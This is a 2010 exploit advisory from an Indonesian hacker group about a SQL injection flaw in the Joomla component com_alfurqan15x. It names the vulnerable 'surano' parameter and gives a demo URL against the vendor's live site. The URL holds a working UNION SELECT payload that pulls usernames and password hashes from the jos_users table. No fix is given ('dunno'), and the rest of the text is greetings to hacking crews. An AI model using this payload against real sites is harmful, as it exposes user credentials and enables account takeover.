## Joomla Component com_alfurqan15x SQL injection ##
## Author : kaMtiEz (kamtiez@indonesiancoder.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 16 Nov, 2010 ##
[ Software Information ]
[+] Vendor : http://islamis4u.co.cc/
[+] Download : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5
[+] version : 2.2 or lower maybe also affected
[+] Tested On : LocalHost
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
##
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs]
[ DEMO ]
http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--
[ FIX ]
dunno :">
##
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n,Hmei7
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,k4mpret0
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock,RyanAby
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Selamat Iedul Adha ;)
[+] pondok buncit @ dejavuNet , ngebir is numero uno
[+] sendiri di malam hari sambil merokok menanti indahnya pagi ;)
[+] turut berduka atas musibah di negaraku .. :((
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
